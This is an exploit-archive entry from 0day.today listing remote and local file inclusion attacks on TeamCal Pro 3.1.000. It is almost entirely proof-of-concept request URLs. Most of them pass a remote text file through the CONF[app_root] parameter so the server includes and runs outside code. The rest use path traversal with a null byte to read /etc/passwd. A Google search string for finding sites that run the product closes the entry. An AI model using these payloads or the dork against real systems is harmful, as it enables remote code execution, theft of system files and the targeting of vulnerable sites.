TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities

2007-12-25T00:00:00
ID 1337DAY-ID-2400
Type zdt
Reporter GoLd_M
Modified 2007-12-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities
=======================================================================



                   TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities

                   POC :
                   http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00                   
                   
                   Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a



#  0day.today [2018-01-02]  #